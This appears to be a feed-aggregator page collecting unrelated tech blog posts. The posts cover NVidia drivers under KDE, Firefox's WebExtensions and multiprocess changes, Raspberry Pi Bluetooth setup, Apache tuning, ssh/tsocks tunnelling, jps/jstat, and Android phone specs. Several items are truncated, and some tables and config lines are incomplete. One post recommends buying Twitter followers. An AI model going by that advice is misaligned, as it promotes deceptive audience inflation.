'Open source is now mainstream...'
'Open source is now mainstream. More and more developers, organizations, and enterprises are understanding the benefits of an open source strategy and getting involved. In fact, The Linux Foundation is on track to reach 1,000 participating organizations in 2017 and aims to bring even more voices into open source technology projects ranging from embedded and automotive to blockchain and cloud.'

- Mike Woster, Global Enterprises Join The Linux Foundation to Accelerate Open Source Development Across Diverse Industries, March 30, 2017


(Open Source) - '..“open innovation.” Companies such as AstraZeneca, Lilly, GSK, Janssen, Merck, Pfizer, Sanofi, TransCelerate, and others..'

'..Microsoft is shifting over to open source for its development.'

          Why not buy VMware Fusion and run XP on top of it?        






          KDE and NVidia (updated)        

KDE Project:

The above combination was never a painless experience; still, at some point in the past it seemed better to have an NVidia card on Linux than anything else, so I kept buying them whenever my system was upgraded. Lately, though, they have been treating me rather badly. I have two computers: one with a 4-core Intel CPU and 8GB of memory, the other a Core2Duo with 3GB. The latter is a Lenovo laptop. Both have NVidia cards, nothing high end (a Quadro NVS something and a 9300GE, both driving dual-monitor setups), but they should be more than enough for desktop usage. Are they?
Well, something goes wrong there. Is it KDE, is it XOrg, is it the driver? I suspect the latter. From time to time (read: often), I ended up with 100% CPU usage for XOrg. Even though I had three cores doing nothing, the desktop was unusable: slow scrolling, jerky mouse movements, typed characters appearing with a delay, things like that. As if I had an XT. I tried several driver versions, as I didn't always have these issues, but with newer kernels you cannot go back to (too) old drivers. I googled and found others with similar experiences, but no real solution. One suspicion is font rendering for some (non-aliased) fonts, e.g. Monospace. Switching fonts sometimes seemed to make a difference, but in the end the bug returned. Others said GTK apps under Qt cause the problem, and indeed closing Firefox sometimes helped. But that wasn't a solution either. There was also a suggestion to turn the "UseEvents" option on. That really seemed to help, but it broke suspend to disk. :( Turning the second display off and on again seemed to help... for a while. Turning off the composite manager did not change the situation.
Finally I tried the latest driver, 256.44, which appeared not long ago. And although the CPU usage of XOrg is still visible, with spikes going up to 20-40%, I regained control over the desktop. Am I happy with it? Well, not quite...
That was only my desktop computer, though. I quickly updated the driver on the laptop as well and went on the road, only to see 100% CPU usage there too. :( I tried all the tricks again, but nothing helped. Until I had the crazy idea to change my widget theme from the default Oxygen to Plastique. And hurray, the problem went away! It is not perfect: with dual monitors enabled, maximizing a Konsole window sometimes takes seconds, but in general the desktop is now usable. And of course this should also give me more uptime on battery.
Do I blame Oxygen? No, not directly. Although it might make sense to investigate what it does that drives the NVidia driver crazy, and report it to NVidia.

So in case you have similar problems, try switching to 256.44, and if that doesn't help, choose a different widget style.

Now, don't tell me to use nouveau or nv. Nouveau gave me graphic artifacts, and it (or KDE?) didn't remember the dual-monitor setup. Nv failed the suspend-to-disk test on my machine and doesn't provide the 3D acceleration needed e.g. for Google Earth.

UPDATE: I upgraded my laptop to 4.5.1 (from openSUSE packages). Well, this broke compositing completely; I got only black windows. Then I saw a new driver was available (256.53), so let's try it. So far, so good, even with Oxygen. Let's see how it behaves in the long run; I haven't tested it in depth.

          Senior Linux Administrator - Zurka Interactive        
Washington, DC - We're looking for an outstanding Sr. Linux Admin to join a top-notch group supporting world class science and technology at the U.S. Naval Research Laboratory (NRL). Zurka Interactive is expanding our team at NRL in Washington DC.
          Linux Administrator - Retail Solutions, Inc.        
Providence, RI - Technical Operations - Providence, RI - Full Time

The Linux Administrator is a contributing member of the RSi Technical Operations team. This team strives to provide a consistent level of world-class, utility-grade support for its internal and external
          Backing up and restoring data on Android devices directly via USB (Howto)        
Motivation: I was looking for a simple way to back up data on Android devices directly to a device running GNU/Linux connected over a USB cable (in my case, a desktop computer). Is this really so unique that it's worth writing a new article about it? Well, in my case, I did not want to buffer Read more »
          Everything that's changing in Firefox        

It is an indisputable fact that the once-mighty browser now comes second, perhaps even third, in the well-known "battle". We won't dwell on the hows and whys, but we will acknowledge that the fox lags behind the competition. At times dramatically.
For quite a few years now, Firefox, the application that once set the pace of web browsing, has ended up chasing it breathlessly, while the risk of fading into obscurity grows ever more visible.
Naturally, this did not go unnoticed by mama Mozilla, which took the admittedly bold decision to take it almost completely apart and build it anew. Strange as it may seem, this is perhaps the first time in a long while that there is a complete plan for building a modern browser, with every choice fully justified on technical grounds. At the same time, the developers are doing everything they can to make the changes land smoothly, so that users are not suddenly confronted with something entirely unfamiliar.
In fact, the new era for Firefox was signaled by the acceleration of the release cycle and the adoption of the so-called "Rapid Release" model, under which a new stable version appears roughly every five to eight weeks. Now this cycle will be sped up even further by removing one step. The release train used to be Nightly -> Aurora (from which the Developer Edition was derived) -> Beta -> Stable; from now on Aurora is gone, with the Developer Edition derived from the current Beta.
Following the same logic of speeding up development, it came as no great surprise that the browser shed its little cousin, Thunderbird, with the latter forced to grow up rather abruptly and chart its own course. If you want more details on that, skip ahead to the end of the article.
Next we will look at exactly how Firefox will be transformed and try to explain the reasons behind these particular changes. The goal is not to convince anyone of the application's merits, but simply to inform. Note that we will not cover all the changes at length, because several of them are still at an early stage; we will stick mostly to those that are already here and those that will be implemented in the near future.

We start with something that, before it is even finished, has drawn a large number of objections, which are expected to intensify as the moment of its rollout approaches. It is the "our add-ons are dead, our add-ons are gone" phenomenon. Well, not gone exactly. And the objections, while understandable, are sometimes exaggerated, especially if one considers the need behind this decision.
What will happen? A fairly large number of add-ons will stop working. Plain and simple. As we said, Firefox is changing, and one of the most important changes is the arrival of a new type of add-on, WebExtensions. Inevitably, such a change means some users will have to look for alternatives to the add-ons that will no longer work, or in some cases make do without them.
Why was this decided, then? Are the developers crazy and indifferent to users? Do they simply not know what they are doing? None of that, of course. What is true, without drowning in overly technical analysis, is that Firefox is old in its guts. The language it uses, XUL, is fairly dated, it is tied to the equally aged Gecko engine (itself scheduled for replacement), and it is hardly used anywhere outside Mozilla. So rather than remain hostage to maintaining that language, they chose to replace it gradually. The problem, however, is that add-ons also use XUL.
Let's look at a few more details to understand the whole issue better. The negatives first, i.e. what users will lose: they will obviously lose some of the add-ons they are used to. This won't necessarily happen to everyone; quite a few existing add-ons have either completed or begun their conversion to WebExtensions. They will also lose, depending on the case, a little or a lot of functionality from their add-ons, even where those exist in their new incarnation. This last part looks particularly ugly, but it is the necessary price for something that will be gained.
Now for what WebExtensions will offer. The first thing is interoperability. They will use APIs compatible with those of Chrome (and of the browsers based on the Blink engine), which means that, on the one hand, add-ons available for other browsers will be able to run, with some small changes, on Firefox too; and on the other hand, someone who wants to create an add-on will no longer face the dilemma of choosing a browser and defaulting to Chrome as the leader in user numbers, but will essentially be able to build one for all.
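To make the interoperability point concrete, here is a minimal, generic WebExtension manifest.json (a sketch of our own, not an add-on mentioned in the article); with small adjustments, the same layout is understood by Firefox, Chrome and other Blink-based browsers:

```json
{
  "manifest_version": 2,
  "name": "hello-webextension",
  "version": "1.0",
  "description": "Minimal cross-browser add-on sketch",
  "permissions": ["activeTab"],
  "browser_action": { "default_title": "Say hello" },
  "background": { "scripts": ["background.js"] }
}
```

The referenced background.js would hold the add-on's logic, written against the shared extension APIs rather than XUL.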
The second major point on the plus side (with the "negative" that it is the price we mentioned earlier) is that using WebExtensions significantly improves security in the browser environment and flexibility in its development. A rather serious reason to make the change, don't you think? For this to happen, though, what an add-on can do will be restricted. Under the current system, via XUL, every add-on potentially has unlimited access to the browser. That gives it great power, enough to change the application's very appearance and behavior. It's nice, we like it, and "power users" especially enjoy it, no argument there. But it carries risks. With access to the internals, a malicious or simply badly written add-on, and there are dozens of those, can do anything from significantly increasing the system's resource consumption (see AdBlock) to opening holes in our online security. It also makes it impossible to move to a newer Firefox version without "breaking" some add-ons.
These are the problems the move to WebExtensions attempts to address. The new add-ons will be less capable, but it will be easier for developers to write correct code, and thus for us to get better-quality add-ons in the future. They will also be considerably safer, and they will no longer be able to bring the browser "to its knees" as they can today.

One more long-awaited change will contribute to improving how the application works: Electrolysis (e10s). The fox finally gains the ability to run its internal tasks as processes that are independent of one another, as Google's rival colossus already does.
Under the existing model, all of Firefox runs one-dimensionally. The user interface, tab management, the add-ons, the rendering of web content: everything lives in the same conceptual space and can interact. This has serious drawbacks. One or two telling examples, which many of you will surely have encountered, are the interface lagging (e.g. when opening a menu) because some web page is misbehaving, or the notification that a script is hurting the application's responsiveness. Things that ought to be unrelated are not. This will cease to be the case, because the individual components will each get their own process. All of this will improve the browser's speed and responsiveness, though it will also increase resource consumption a little.
With one important detail here: perhaps learning from others' mistakes, Firefox's multiprocess operation will not work exactly as in Chrome. That is, a new process will not be spawned for every new tab, driving RAM consumption to excessive levels. Instead, there will be a fixed number of processes allotted to tabs, another for add-ons, a third for the graphical interface, and so on. A technical compromise, in other words, that tries to reap as many of the benefits as possible while paying the smallest possible price.
Electrolysis was initially enabled as a trial for a limited number of users, a number that is gradually growing, and from version 54 it will be pre-enabled for those users who use no add-ons at all. Why only for them? A telling sign of how necessary the changes, and the abandonment of the old way of working, really are is that Electrolysis is blocked (and automatically disabled) if we install an add-on that is not compatible with it.
We stress that the milestone is version 57, scheduled for this coming November. With its arrival, e10s will be active for everyone, most likely with four processes by default, and at the same time every non-WebExtension add-on will stop working. Anyone who needs a little more time will be able to switch to the corresponding ESR (Extended Support Release).
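For the curious, the number of content processes is governed by a preference; assuming the pref name in use at the time of writing (dom.ipc.processCount), a user.js line such as the following sets it to the expected default of four:

```
user_pref("dom.ipc.processCount", 4);
```

The same value can be inspected or changed interactively via about:config.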
To help users along, there is already a page listing the compatible add-ons. There is also a relevant tag on the page with all Firefox add-ons, and in the upcoming releases, until the old add-ons are finally shown the door, the browser will display a "LEGACY" label next to any add-on that is not compatible, with a pointer to add-ons of equivalent functionality.

Project Photon
Photon is a…
          Sejda offers 30 online tools for doing anything with PDFs, plus an application for Windows, Mac and Linux        
Sejda is a suite offering 30 online tools for doing just about anything with PDFs, plus an application for Windows, Mac and Linux. The main functions are: split, merge, office & PDF, edit & sign, compress & convert, that is, splitting, merging, converting office documents to and from PDF, editing and signing, and compressing and converting to other formats. Let's see […]
          How to use Twitter to promote your business online        

Twitter can be a very powerful tool for marketing any business or website online; by using it, a person can reach thousands, hundreds of thousands, or even millions of potential customers on a consistent basis.

Tweeting Consistently
Once a person creates a Twitter profile for their business or website, they should tweet and update the profile consistently. Regular tweeting keeps followers engaged with the information being posted, and it usually helps attract new followers as well.

Respond To Tweets
When a person has a Twitter account, other users can send tweets directly to their profile. This is an excellent way for a business to connect with current and potential customers.

If a person has any questions for a business owner, they can easily ask those questions on Twitter. In addition, a question asked by one customer or potential customer is likely shared by many others, so when a business owner answers one person's question, they are probably answering it for many other people as well.

Gaining More Followers

In order to reach a large number of people on Twitter, it's vital to gain a large number of followers. There are many ways to gain followers, and one of them is to buy Twitter followers.

When a business owner buys Twitter followers, they should make sure the followers they bought are real and active. The more active the followers, the more successful the business's Twitter marketing strategy will be.

Following Other Twitter Users

In addition to gaining followers on Twitter, a business should follow other Twitter users. Following others promotes interactivity, and a business that follows many other people and profiles is likely to gain followers for its own profile much more quickly.

Posting Funny And Interesting Information

A business owner should frequently post funny, interesting, and informative content on Twitter. Such content keeps a business's followers interested and engaged, and it increases the likelihood that they will retweet the business's tweets.

When Twitter users retweet content that a business has posted, that content can quickly reach hundreds of thousands or even millions of other users, so a business can reach many more potential customers by having its followers retweet its content.

In addition, a business owner should occasionally post deals and discounts on certain products and services through their Twitter account. Deals and discounts attract new customers to the business, and they make it likely that customers who have already placed orders will place more in the near future.

About the author: This article was written by Andy G, a tech geek and Linux fan from Austria. He currently maintains a firmware and driver download website, http://www.helpjet.net/

          How to Write and Compile C++ Code in Linux         


          Blunder of the year!!! Nokia shuts down NokiaBR...        
The blogosphere is abuzz today over the shutdown of the NokiaBR blog at Nokia's demand. José Antônio received a notice from a law firm about improper use of the "Nokia" trademark (on which, admittedly, they have a point), and among other threats and demands, the result was the immediate cancellation of the NokiaBR domain.
The strangest part is that NokiaBR was run by a card-carrying fan of the brand, and its content was largely positive for the Finnish company... But, as Bia Kunze of Garota Sem Fio put it, instead of going after the "Nokla" counterfeiters, they went after José Antônio.
The trouble is that these law firms are like those pesky little dogs that bark as loudly as they can to seem fierce, and end up scaring away the very people they shouldn't...
I had a similar experience a few years ago... I own a small retail chain that sold a brand of products caught in a dispute between the old importer, from whom I bought my stock, and the new one. One fine day an "extrajudicial notice" arrived from a law firm representing the new importer, which, among other threats, said that a seizure order would be issued for all of my stock, acquired LEGALLY from the old importer...
I immediately called the new importer's sales representative, since I was one of the state's biggest customers for the company's other brands, and offered to clear out the stock I had acquired from that brand's old importer as quickly as possible, selling below cost and no longer featuring it in the shop window.
I also demanded that no representative of that company, the new importer that had sent the notice, ever set foot in my stores again, as they would not be seen. In other words, a two-bit lawyer scared off one of the company's biggest customers...
To this day, more than five years later, this importer's directors and managers try their hardest at every trade fair to "reopen the point of sale"...
See José Antônio's account on his blog, Zeletron.
See the reaction around the blogosphere...
Garota Sem Fio
Rodrigo Toledo
Picolé Parcelado
I'll go with Rodrigo Toledo's suggestion: let's all link to José Antônio's "Nokia-authorized" blog, Zeletron, so that before long it ranks well on the Googles of the world...

Update: see Nokia's response on the matter.
          FileZilla 3.0: finally released, but…        
FileZilla used to be an FTP client available only for Windows; with the release of version 3.0, FileZilla is now available on Linux and *BSD. A free FTP client, fast, known for being highly configurable and offering a wide range of options. Yes, but there's a catch. The source code of FileZilla 3.0 has [...]
          Cost of business        
What people often overlook is that the cost of doing business in Europe is generally higher than in the US, due to a lot of little things: localisation for smaller markets, complying with directives like RoHS, better warranties (in theory at least), better consumer protection for buying online, etc.
          RE[8]: embedded        
So an embedded Linux system like the WRT54G wireless router is less secure than a Linux system running on your $500 Mac?
          RE[9]: embedded        
Can you do traffic control, QoS, proxying, content inspection, NID... with a WRT54G? Does it support SELinux, Openwall, AppArmor, RSBAC, grsecurity, PaX...? Has it been compiled with SSP protection?
          [RPi] Installing Arch Linux and Bluetooth on a Raspberry Pi        
A while ago I got a Raspberry Pi (RPi for short below) to use for Bluetooth testing; the Bluetooth dongle is an ORICO BTA-403-BL (http://item.jd.com/980800.html). Here is a quick record of the setup process:

First, the operating system. As a heavy Arch user, naturally I chose Arch Linux ARM: http://archlinuxarm.org/platforms/armv6/raspberry-pi — download the img file and write it to the SD card with dd:
dd bs=1M if=/path/to/archlinux-hf-*.img of=/dev/sdX

Then use GParted to grow the partition to fill the SD card and make full use of the space. The SD card is now ready: insert it into the RPi, connect the Micro-USB power and the network cable, and boot the RPi. Find the RPi's IP address from the router (the default hostname is alarmpi), ssh in (username root, password root), change the password, create a non-root account, and update the system with sudo pacman -Syu. After that, install the Bluetooth tools:
sudo pacman -S bluez bluez-utils

Make sure the Bluetooth dongle is plugged into one of the RPi's USB ports, then confirm the device is recognized with hciconfig; the output should look something like this:
[sean@alarmpi]$ hciconfig
hci0:   Type: BR/EDR  Bus: USB
        BD Address: 84:A6:C8:DC:04:97  ACL MTU: 310:10  SCO MTU: 64:8
        RX bytes:553 acl:0 sco:0 events:28 errors:0
        TX bytes:384 acl:0 sco:0 commands:27 errors:0

Then start the Bluetooth service:
sudo systemctl start bluetooth

Once that's done, you can open the Bluetooth console with the bluetoothctl command and perform the various Bluetooth operations: show, list, scan on, agent, info, and so on; I won't expand on those here.

Optionally, for a graphical desktop:
sudo pacman -S xorg xorg-xinit lxde
echo 'exec startlxde' > ~/.xinitrc


laogao 2014-01-01 13:11

          [Tips] The most basic Apache tuning on Windows        


A Java EE application, deployed on two Tomcat (5.5.27) instances, fronted by Apache (httpd-2.2.19-win32-x86-no_ssl) doing load balancing via mod_jk (1.2.32), all on the same physical server running 64-bit Windows Server 2003 SP2. The symptom: with 60+ clients, each averaging 2 requests per second, and a single request normally completing within 500ms, that is, 120 requests per second coming in and concurrency peaking around 60, Apache was already buckling under the "load": even static resources were taking over 10s to respond, while Tomcat and the database server were both fine. In my experience, the same load hitting Tomcat directly wouldn't look this bad. So the problem had to be Apache.


LoadModule status_module modules/mod_status.so
<Location /status>
  SetHandler server-status
  Order deny,allow
  Deny from all
  # Fill in the address(es) allowed to see the status page;
  # this can be opened up to "all" if needed.
  Allow from
</Location>


<IfModule mpm_winnt.c>
  ThreadsPerChild 300
  MaxRequestsPerChild 0
</IfModule>

A quick explanation: mpm_winnt.c is the MPM (Multi-Processing Module) Apache provides for Windows NT; on Linux the choices are prefork.c (multiple processes, one thread per process) and worker.c (multiple processes, multiple threads). On Windows there are only two processes, a parent and a child, so how many threads the single child process can run concurrently (ThreadsPerChild) becomes the key tuning knob. The other parameter, MaxRequestsPerChild, is the cumulative maximum number of requests a child process will handle before exiting and being restarted; this is a defensive measure against memory leaks slowly dragging the whole server down, and 0 means no such limit.
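For comparison, on Linux the analogous knobs live in the worker MPM; a sketch with illustrative values, not tuned for any particular workload:

```apache
<IfModule mpm_worker_module>
    # Up to ServerLimit child processes, ThreadsPerChild threads each;
    # MaxClients caps the total number of simultaneous connections.
    StartServers          2
    ServerLimit          16
    ThreadsPerChild      25
    MaxClients          400
    # 0 = never recycle a child process
    MaxRequestsPerChild   0
</IfModule>
```

The same trade-off applies: total concurrency is the product of processes and threads per process.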

After the new configuration went live, the client count sailed past 200+. Case closed.

laogao 2011-08-02 21:04

          ssh + tsocks: a power tool for remote work        

Picture this scenario: you are away on a business trip, or sick at home, and an urgent task comes up involving changes to several source files. Making the changes yourself would take 10 minutes; explaining them over the phone to a colleague at the office and having him or her make them would take an hour. The company's svn service only supports the svn:// protocol and is only reachable from the internal network, and all you have is an ssh account for logging in remotely to one of the company's Linux/UNIX servers.

You count yourself lucky that the admin had the foresight to leave you an ssh door: at the very least you can ssh in and do svn checkout, vim ... and svn commit from the command line on the server. But if you think that's all there is, you are seriously underestimating ssh.

ssh has a command-line option, -D [address:]port, which opens a SOCKS service listening on the given port of a local address and forwards that port's traffic, encrypted, to the other end of the ssh connection. You say: fine, now I have a SOCKS server, but I'm not trying to browse the web through a proxy, and svn has no native SOCKS support, so what's the use? Well, this is exactly where tsocks comes in: it transparently makes ordinary applications speak SOCKS. Installation is simple: mainstream Linux distributions such as Debian and Arch Linux ship tsocks in their default repositories, so apt-get install or pacman -S is usually all it takes; on Mac OS X you can install it via MacPorts. Then edit the configuration file /etc/tsocks.conf (MacPorts installs it under /opt/local/etc), starting from the sample file tsocks.conf.sample; normally setting server = is all you need, and everything else can stay at the defaults.

With that groundwork in place, the rest is easy: first run ssh -D 1080 -f -N username@company-server-public-address to start the SOCKS service on local port 1080; then use svn exactly the way you always do, just prefixing the command with tsocks, like tsocks svn up or tsocks svn ci -m 'blahblahblah'. Your local svn sandbox needs no changes at all.
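A minimal /etc/tsocks.conf matching this setup might look like the following; the local subnet line is an illustrative assumption, adjust it to your own network:

```
# Traffic to the local network goes direct; everything else is sent
# through the SOCKS service opened by "ssh -D 1080 ...".
local = 192.168.0.0/255.255.255.0
server = 127.0.0.1
server_port = 1080
server_type = 5
```

With this in place, tsocks-wrapped programs route their TCP connections through the ssh tunnel automatically.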

This example is just the tip of the iceberg: both ssh and tsocks have more advanced uses, and once this channel is open, it works like a simplified VPN. Apart from a few commands like ping, it is almost as if you were doing everything from inside the office. So, let your imagination run :)

laogao 2011-02-09 22:37

          How to make a single build of an Eclipse RCP application support multiple platforms        

Unlike Swing applications, which are cross-platform out of the box, an SWT/RCP application needs some special configuration to support several platforms at once. It isn't complicated, though; I'm recording it here in the hope that it helps someone who needs it. win32, 32-bit Linux, 64-bit Linux and Mac OS X cover essentially all mainstream desktop operating systems today, so this article uses simultaneous support for these four as its example.








Next, put the eclipse executable for each platform (eclipse.exe on Windows, eclipse on Linux, Eclipse.app on Mac OS X) into its own subdirectory. Of course, if your RCP application has another name, you can also rename the eclipse executable and swap in icons according to each platform's conventions. Then edit the .ini file so that its -startup and --launcher.library parameters point, via relative paths, to the correct platform-specific version of the plug-ins.

Finally, a word on how we deploy our software: an application packaged as described above is not very friendly to hand to users directly, because each user has to work out which operating system they are on, then open the right directory and click the right executable. Our approach is to ship a separate small Swing program that detects the OS on the client side and automatically launches the appropriate executable. This Swing program is delivered via Java Web Start, which also takes care of downloading and keeping the whole RCP client in sync. For the user, the entire process becomes transparent: one JNLP, and the rest is fully automated.
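The OS-detection step of such a launcher can be sketched in a few lines of Java. This is a hypothetical illustration; the directory names win32/, linux32/, linux64/ and macosx/ are assumptions, not the article's actual layout:

```java
// Sketch of the launcher's OS-detection step: map the JVM's os.name /
// os.arch properties to the platform-specific RCP executable.
public class LauncherSketch {

    static String pickLauncher(String osName, String osArch) {
        String os = osName.toLowerCase();
        if (os.contains("win")) {
            return "win32/eclipse.exe";
        }
        if (os.contains("mac")) {
            return "macosx/Eclipse.app/Contents/MacOS/eclipse";
        }
        // Assume Linux/UNIX otherwise; pick 32- vs 64-bit by os.arch.
        boolean is64bit = osArch.contains("64");
        return is64bit ? "linux64/eclipse" : "linux32/eclipse";
    }

    public static void main(String[] args) {
        String path = pickLauncher(System.getProperty("os.name"),
                                   System.getProperty("os.arch"));
        System.out.println("Would launch: " + path);
    }
}
```

In the real deployment, this decision would feed into something like ProcessBuilder, with Java Web Start handling download and synchronization around it.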

laogao 2011-01-30 12:17


On Linux and other UNIX and UNIX-like systems, everybody knows the ps command, and I'm sure quite a few of you have written pipelines like ps aux | grep java | grep -v grep | awk '{print $2}' to find a Java process's pid. As the saying goes, Java isn't really "cross-platform": it is the platform. And as a platform, it naturally provides some basic tools that let us query process information in a simpler, more uniform, and non-intrusive way. Today let's meet two of them.



The first is jps, which lists the Java processes on a host:

jps [ options ] [ hostid ]

Here, options can be -q (quiet), -m (print the arguments passed to the main method), -l (print the full path), -v (print the command-line arguments passed to the JVM), -V (print the arguments passed to the JVM via a flags file), or -J (as in other Java tools, passes an option to the java process backing the command itself); hostid is the host identifier, defaulting to localhost.



jstat -options lists the options supported by the current JVM version. Common ones include -class (class loader), -compiler (JIT), -gc (GC heap status), -gccapacity (sizes of the generations), -gccause (summary of the most recent GC and its cause), -gcnew (new generation stats), -gcnewcapacity (new generation size), -gcold (old generation stats), -gcoldcapacity (old generation size), -gcpermcapacity (permanent generation size), -gcutil (GC summary) and -printcompilation (HotSpot compilation stats).

For example, jstat -gcutil -t 12345 200 300 prints timestamped GC summary statistics every 200 milliseconds, 300 times in a row.

A quick breakdown: -gcutil is the option being passed, required; -t prints a timestamp, counted from the target JVM's start time, optional; 12345 is the vmid/pid, the same value jps gives us, required; 200 is the sampling interval, optional, and omitting it means a single snapshot; 300 is the maximum number of samples, optional, and if omitted while an interval is given, it keeps printing indefinitely.

For a detailed explanation of the output columns, see the official documentation: http://download.oracle.com/javase/6/docs/technotes/tools/share/jstat.html

laogao 2011-01-27 12:04



1- Continue last year's unfinished product overhaul, pushing it forward in a steadier way;
2- Take an active part in community exchanges, both online and offline;
3- Study Scala in depth, with Clojure and Haskell on the side;
4- Learn PostgreSQL systematically;
5- Switch to Emacs across the board;
6- Start reading the Linux source code;
7- Re-read 《红楼梦》 (Dream of the Red Chamber);
8- Read at least two books in the original English;
9- Take my son back to my hometown.


laogao 2011-01-02 20:08

          Sony Ericsson Xperia X10: Has The Playing Field Changed Since it Was Announced in 2009?        


The hardware was great when it was first introduced, things I would suggest to make this phone truly great hardware-wise are:

  • AMOLED screen
  • At least 8GB internal memory
  • 512 MB Ram
  • HD Video (720P)
  • HDMI output

Those changes alone (even running Android 1.6) would see this phone sell like crazy. I'd go as far as saying just having 16GB of internal memory and micro-SD would make this the best phone to get.

Negatives Hardware

Last year, when Sony announced this phone, it had the best hardware you could get. Now the HTC Bravo, HTC Supersonic, Nexus One, and Motorola Motoroi have changed this, since they introduced 720p video recording, AMOLED screens, 512 MB of RAM, or HDMI output, depending on the particular phone.


The Sony UX interface is great, but the OS holds back the hardware. It's like taking a Ferrari for a spin during rush hour! Here's why Android 1.6 is the bottleneck:

  1. No HTML5 support

  2. Poor white/black ratio compared to Android 2.0/2.1

  3. Microsoft Exchange support not good/missing

  4. No live wallpapers

  5. Android 2.0 has better keyboard

  6. Android 1.6 Only supports 65K colors vs 16 million for 2.0/2.1

  7. Android 1.6 does not combine e-mail inboxes from multiple accounts in one page – does MediaScape offer this?

  8. Search functionality for all saved SMS and MMS messages

  9. Auto delete the oldest messages in a conversation when a defined limit is reached – does MediaScape provide this?

  10. Support for double-tap zoom

  11. No Bluetooth 2.1 (No Object Push Profile and Phone Book Access Profile) – MediaScape?

  12. Android 1.6 has no multi-touch support

  13. Android 1.6 has limited Speech-to-text support compared to 2.1 (All text fields!)

  14. Android 2.1 has additional home screens

          Guide for Picking The Best Android Phone for You        
Sony Xperia X10 vs Nexus One vs Motorola Droid vs Acer Liquid vs Archos

Xperia X10

Nexus One

Motorola Droid

Acer Liquid

(Updated: 21st Jan 2010) The Android handset landscape has changed drastically over the past year, from a literal handful of options to – the fingers on both your hands, the toes on both your feet and all the mistresses Tiger Woods has had in the past 24 hours (OK, maybe 4 hours). You get the point though, there are quite a few options and through the course of 2010 these options will only increase.

The only other mainstream handset smartphone option that rivals the Android handset options available in 2010 will be the Windows mobile platform – and we're all rushing for it – not!

So what are the handsets to consider in 2010? The ones currently released on the market that we will look at are the Acer Liquid and Motorola Droid and an additional three to be released early 2010, the Sony Xperia X10, Google Nexus One (Passion, HTC Bravo) and Archos Phone Tablet – though we only have a handful of details on the phone.

Archos Phone

We will look at hardware and software sub-categories, and compare the phones based on the information we have.



The Nexus One and Sony Xperia X10 have the snappier 1GHz Qualcomm Snapdragon processor onboard. The Acer Liquid has a downclocked version of the Snapdragon running at 768MHz, perhaps to conserve battery. This would probably put the Acer Liquid's performance more on par with the Motorola Droid's. The Archos Phone promises to be a really fast phone, with an upgraded ARM Cortex processor running at 1GHz and an improved GPU over the Droid and iPhone.

Nexus One:       Qualcomm Snapdragon QSD 8250, 1.0 GHz
Motorola Droid:  Texas Instruments OMAP 3430, 550 MHz
Sony Xperia X10: Qualcomm Snapdragon QSD 8250, 1.0 GHz
Acer Liquid:     Qualcomm Snapdragon QSD 8250, 768 MHz
Archos Phone:    ARM Cortex, 1.0 GHz


The Snapdragon's Adreno 200 graphics core is phenomenal on the triangle-render benchmark, coming in at approximately 22 million triangles per second, compared to approximately 7 million triangles per second for the Motorola's SGX530. This is an important element for 3D graphics. Interestingly, the iPhone 3GS has a similar CPU to the Motorola Droid but an upgraded, faster SGX535 GPU capable of 28 million triangles per second and 400 M pixels per second. The Archos may get a better SGX GPU.

Xperia X-10 Graphics Demo

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone

Adreno 200 Graphics Core with OpenGLES 2.0

PowerVR SGX530 Graphics Core with OpenGLES 2.0

Adreno 200 Graphics Core with OpenGLES 2.0

Adreno 200 Graphics Core with OpenGLES 2.0

PowerVR SGX540?

22 M Triangles/sec

7 M Triangles/sec

22 M Triangles/sec

22 M Triangles/sec

35 M Triangles/sec

133 M Pixels/sec

250 M Pixels/sec

133 M Pixels/sec

133 M Pixels/sec

1000 M Pixels/sec

HD Decode (720p)

HD Decode (720p)

HD Decode (720p)

HD Decode (720p)

3-D Graphics Benchmark

Motorola Droid 20.7 FPS (Android 2.0).

Nexus One 27.6 FPS. (Android 2.1)

Acer Liquid 34 FPS. (Android 1.6)

Xperia X10 34FPS+ est. (Android 1.6)

Note: All phones were tested running WVGA resolution, 480 x 800 or 480 x 854. Different versions of Android will be a factor, e.g. Android 2.0+ reproduces 16 million colors vs 65K for 1.6. Older phones such as the G1 and iPhone 3GS may score 25-30 FPS, but they use the lower 480 x 320 resolution.
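The color counts in that note follow directly from bits per pixel (Android 1.6 used a 16-bit display pipeline, 2.0+ renders 24-bit color), and the resolution gap is plain arithmetic:

```python
# Color depth: each extra bit per pixel doubles the number of colors.
colors_16bit = 2 ** 16  # Android 1.6
colors_24bit = 2 ** 24  # Android 2.0+

print(colors_16bit)  # 65536 -> the "65K" figure
print(colors_24bit)  # 16777216 -> the "16 million" figure

# Resolution matters for fill rate: WVGA pushes ~2.7x the pixels of 480x320.
wvga = 480 * 854
hvga = 480 * 320
print(round(wvga / hvga, 2))  # 2.67
```

So a G1 scoring 25-30 FPS is rendering under half the pixels of the WVGA phones above, which is why those scores aren't directly comparable.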


The Nexus One comes in with an impressive 512 MB of RAM. This provides an element of future-proofing for the hardware and puts it in a league of its own. The Xperia X10 comes with 1 GB of ROM and 384 MB of RAM. The 1 GB means you'll be able to hold twice as many apps on your phone, at least until Google lets you install to removable memory. The Acer Liquid and Droid are more or less the same.

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone


512 MB

256 MB

384 MB

256 MB


512 MB

512 MB

1024 MB

512 MB


The Nexus One uses an AMOLED screen, which provides crisper images and more saturated colors than a TFT-LCD. It's also more energy efficient. The Xperia X10 packs a 4.0 inch TFT screen with 854 x 480 resolution, so expect picture quality on the Sony Ericsson phone similar to the Motorola Droid's. The Archos Phone promises to deliver an interesting experience that could potentially make it the King of Androids.

Spot the difference: Top TFT-LCD screen and bottom OLED

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone

800 x 480 px, 3.7 in (94 mm), WVGA,


854 x 480 px, 3.7 in (94 mm), WVGA,


854 x 480 px, 4.0 in (102 mm), WVGA,


800 x 480 px, 3.5 in (89 mm), WVGA,


854x 480px, 4.3 in (109mm), WVGA, AMOLED

Display Input

All standard stuff here. All the phones are capacitive, with multi-touch support depending on the continent you buy your phone in.

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone

Capacitive, Multi-Touch

Capacitive, Multi-Touch

Capacitive, Multi-Touch

Capacitive, Multi-Touch

Capacitive, Multi-Touch


